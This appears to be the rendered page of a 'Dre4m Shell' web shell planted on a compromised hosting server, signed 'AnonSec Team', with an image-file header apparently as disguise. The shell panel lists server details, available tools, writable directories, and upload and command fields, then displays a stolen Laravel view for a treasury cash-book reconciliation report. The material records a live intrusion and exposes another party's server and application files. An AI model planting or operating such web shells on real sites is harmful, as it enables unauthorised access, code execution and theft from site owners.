ÿØÿàJFIFÿáExifMM*ÿÛC  Dre4m Was Here
Dre4m Shell
Server IP : 199.250.214.225  /  Your IP : 3.133.114.36
Web Server : Apache
System : Linux vps64074.inmotionhosting.com 3.10.0-1160.105.1.vz7.214.3 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : nicngo5 ( 1001)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /home/nicngo5/fundscopied/resources/views/njcReconciliation/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/nicngo5/fundscopied/resources/views/njcReconciliation/show.blade.php
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
  <meta charset="utf-8">
  <meta content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no" name="viewport">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <link rel="shortcut icon" href="images/favicon.ico">
  <title>Treasury Cash Book</title>
  <link rel="stylesheet" href="{{ asset('assets/css/bootstrap.min.css') }}">
  <script src="{{ asset('assets/js/jQuery-2.2.0.min.js') }}"></script>
  <link rel="stylesheet" href="{{ asset('assets/css/StyleInput.min.css') }}">
  <script> var murl = "{{ url('/')}}"; </script>
  </head>
<body>

  <style type="text/css">
    .table td{
      border: #9f9f9f solid 1px !important;
      font-size: 11px !important;
      padding: 1px !important;
  }
  .table th{
      border: #9f9f9f solid 1px !important;
      font-size: 11px !important;
      padding: 1px !important;
  }
  .table tr th td{
      width: auto !important;
      
  }
</style>

  <div class="box-body hidden-print">
    <div class="row">
      <div class="col-md-12">
        @if (count($errors) > 0)
        <div class="alert alert-danger alert-dismissible" role="alert">
          <button type="button" class="close" data-dismiss="alert" aria-label="Close"><span aria-hidden="true">&times;</span>
          </button>
          <strong>Error!</strong> 
          @foreach ($errors->all() as $error)
          <p>{{ $error }}</p>
          @endforeach
        </div>
        @endif

        @if(session('msg'))
        <div class="alert alert-success alert-dismissible" role="alert">
          <button type="button" class="close" data-dismiss="alert" aria-label="Close"><span aria-hidden="true">&times;</span>
          </button>
          <strong>Success!</strong> 
          {{ session('msg') }}
        </div>                        
        @endif

        @if(session('err'))
        <div class="alert alert-warning alert-dismissible" role="alert">
          <button type="button" class="close" data-dismiss="alert" aria-label="Close"><span aria-hidden="true">&times;</span>
          </button>
          <strong>Input Error !</strong> 
          {{ session('err') }}
        </div>                        
        @endif
      </div>
    </div><!-- /.col -->
  </div><!-- /.row -->


   <div align="center">
		 @include('layouts.allReportHeader', ['companyName'=>'defaultName', 'companyAddress'=>'defaultAddress', 'title1'=>'', 'title2'=>'', 'showOnlyTitle1'=>1, 'showOnlyTitle2'=>1, 'hideLogos'=>1, 'hideAddress'=>0])
	</div>

  @if($reportType == 1)
        @include('njcReconciliation.partial_report.splitReport')
    @else
        @include('njcReconciliation.partial_report.viewAllReport')
  @endif
      
  <script src="{{ asset('assets/js/bootstrap.min.js') }}"></script>
 <script src="{{asset('assets/js/jquery-ui.min.js')}}"></script>
</body>
</html>

Anon7 - 2022
AnonSec Team